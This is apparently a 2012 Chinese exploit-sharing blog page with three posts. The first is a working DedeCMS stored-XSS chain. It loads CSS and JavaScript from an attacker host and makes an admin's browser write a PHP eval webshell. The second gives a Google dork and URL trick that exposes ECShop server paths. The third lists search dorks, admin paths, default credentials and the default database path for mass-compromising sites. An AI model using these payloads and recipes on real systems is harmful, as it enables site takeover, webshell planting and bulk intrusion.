DEDECMS XSS GETSHeLL 通杀所有版本

利用条件:开启注册&&开启投稿
方法 :注册会员 -> 发表文章:内容输入

<style>@import´http://xxx.com/xss.css´;</style>

  
xss.css内容:
body{background-image:url(´javascript:document.write(“<script src=http://xxx.com/logo.jpg></script>”)´)}
  
logo.jpg内容:
  
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType(´text/xml´);
}
} else if(window.ActiveXObject) {
var versions = [´Microsoft.XMLHTTP´, ´MSXML.XMLHTTP´, ´Microsoft.XMLHTTP´, ´Msxml2.XMLHTTP.7.0´,´Msxml2.XMLHTTP.6.0´,´Msxml2.XMLHTTP.5.0´, ´Msxml2.XMLHTTP.4.0´, ´MSXML2.XMLHTTP.3.0´, ´MSXML2.XMLHTTP´];
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
xmlhttp=request;
function getFolder( url ){
obj = url.split(´/´)
return obj[obj.length-2]
}
oUrl = top.location.href;
u = getFolder(oUrl);
add_admin();
function add_admin(){
var url= “/”+u+”/sys_sql_query.php”;
var params =”fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=%3C%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F%3E&B1=++%E4%BF%9D+%E5%AD%98++”;
xmlhttp.open(“POST”, url, true);
xmlhttp.setRequestHeader(“Content-type”, “application/x-www-form-urlencoded”);
xmlhttp.setRequestHeader(“Content-length”, params.length);
xmlhttp.setRequestHeader(“Connection”, “Keep-Alive”);
xmlhttp.send(params);
}
 
 
 
 
1 记住这个js脚本吧,get post cookies都可以用这种模式。
2 这个ajax写得很完善.(新浪蠕虫依赖jquery直接使用ajax).
发布日期2012-02-13 标签: 分类: 安全漏洞
抢沙发

ECShop v2.7.2 wap页面暴路径0day

 文章作者: by:hackshy

谷歌:inurl:mobile/goods.php?act=view_img&id=123

搜到后在页面加个&id=5
也就是http://www.hackqing.com/mobile/goods.php?act=view_img&id=123&id=5

譬如,对于很多论坛来说,提交一个不存在的文件请求,或者提交一个没有输出的文件的请求,服务器就会将网站本身所有的物理路径给暴露出来。
危害得到物理路径到底有什么用?这是很多攻击者关心的问题。有些时候它能给攻击者带来一些有用的信息,比如说:可以大致了解系统的文件目录结构;可以看出系统所使用的第三方软件;也说不定会得到一个合法的用户名(因为很多人把自己的用户名作为网站的目录名)

发布日期2012-02-13 标签: 分类: 安全漏洞
抢沙发

QQ 拍卖系统eweb 0day批量拿站

批量关键字:inurl:QQsales.asp

后台地址:editer/admin_login.asp

默认账号密码:admin

默认数据库地址:editer/db/ewebeditor.mdb


虽然很久了。。但是还是很多站存在。。

发布日期2012-02-12 标签: 分类: 安全漏洞
抢沙发